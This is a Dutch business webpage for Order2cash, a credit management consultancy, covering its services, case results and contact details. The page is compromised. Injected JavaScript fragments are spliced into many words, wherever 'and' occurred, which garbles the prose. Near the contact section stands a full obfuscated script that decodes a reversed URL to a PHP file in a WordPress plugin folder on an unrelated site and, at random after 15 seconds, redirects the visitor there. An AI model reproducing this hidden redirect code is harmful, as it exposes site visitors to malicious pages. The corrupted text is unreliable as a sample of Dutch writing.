• UW KLANTEN, UW GELD

    Uw klanten, uw geld. Vaak gaat het samen, soms niet. Order2cash kan u helpen om uw geld sneller binnen te krijgen zonder uw klant te verliezen.

Visie op credit management

Credit management gaat niet alleen over het binnenhalen van geld. Ruimer gezien gaat het over de relatie die u met uw klant heeft. Natuurlijk wilt u die relatie graag behouden. Maar u wilt ook het geld waar u recht op heeft zo snel mogelijk binnenkrijgen. Om dit te bewerkstelligen moet credit management niet pas starten als er al openstaandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande facturen zijn. Maar eerder.

Diensten

Wat kunnen wij voor u doen:

Procesverbeteringenandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}
Door te kijken naar het end andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to end proces van order andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tot betaling kunnen wij knelpunten aan het licht brengen. Hier kunnen wij verbetervoorstellen voor aandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andragen. Deze kunnen vervolgens projectmatig opgepakt worden. Doordat wij in een vroeg stadium medewerkers betrekken zorgen wij voor een goede borging. Wij gebruiken hiervoor onder andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andere kennis en technieken vanuit Lean en Six Sigma.

Projectmanagementandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}
Is het al bekend wat er moet gebeuren? Nu moet het alleen nog uitgevoerd worden? Ook daar kunnen wij u bij helpen.

Interim managementandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}
Tijdelijk vervanging nodig? Iemandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and nodig die er voor zorgt dat de afdeling weer gaat lopen en het daarna overdraagt aan uw eigen medewerker? Wij helpen u graag!


Resultaten

Slimmer, sneller, samen

Andere werkwijze andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Bij aanvang waren er meer dan 250.000 betalingen niet verwerkt. Gevolg was dat klanten onterecht herinneringen en aanmaningen kregen. De klanten gingen daar natuurlijk over bellen. Hierdoor werd de druk op de organisatie nog groter. Door een wijziging van de werkprocessen op de afdeling werd bereikt dat de dagelijkse instroom meer dan bijgehouden kon worden. Er ontsandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tond daarnaast ruimte om de achterstandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and in te lopen. 3 maandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and eerder dan geplandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and was de afdeling helemaal bij. Door de betere werkprocessen is de omvang van de afdeling teruggebracht met 40%.

Versnelling incassoprocesandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

In het normale proces was 60 dagen na het versturen van de factuur 93% van de vorderingen betaald. Door samen met de medewerkers een proces te ontwerpen waar alleen de noodzakelijke stappen in zaten hebben wij bereikt dat na verloop van tijd op 60 dagen na versturen van de factuur 99% van de vorderingen betaald was. Het geld kwam niet alleen sneller binnen maar er gingen ook veel minder klanten door naar de tijdrovende en lastige incasso/deurwaarderstrajecten. Daarnaast waren de klanten meer tevreden over het nieuwe proces omdat problemen eerder en sneller werden opgepakt.

Bestendige groeiandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Na aan de medewerkers te hebben gevraagd wat zij nou echt nodig hadden om de klanten goed te helpen, hebben wij dat vervolgens ingericht. De hele afdeling werd ingericht en aangestuurd met deze focus als doel. Medewerkers konden zelf aangeven waar zij het meest door gehinderd werden. Deze problemen werden vervolgens samen met de medewerkers opgelost. Gevolg was dat medewerkers zich steeds meer betrokken voelden. Daarnaast zagen wij de klanttevredenheid stijgen.

Contact

Robert Tjoonk

 06 -21 50 59 21

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to:robert@order2cash.nl”>robert@order2cash.nl

www.order2cash.nl

andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}http://nl.linkedin.com/in/rtjoonk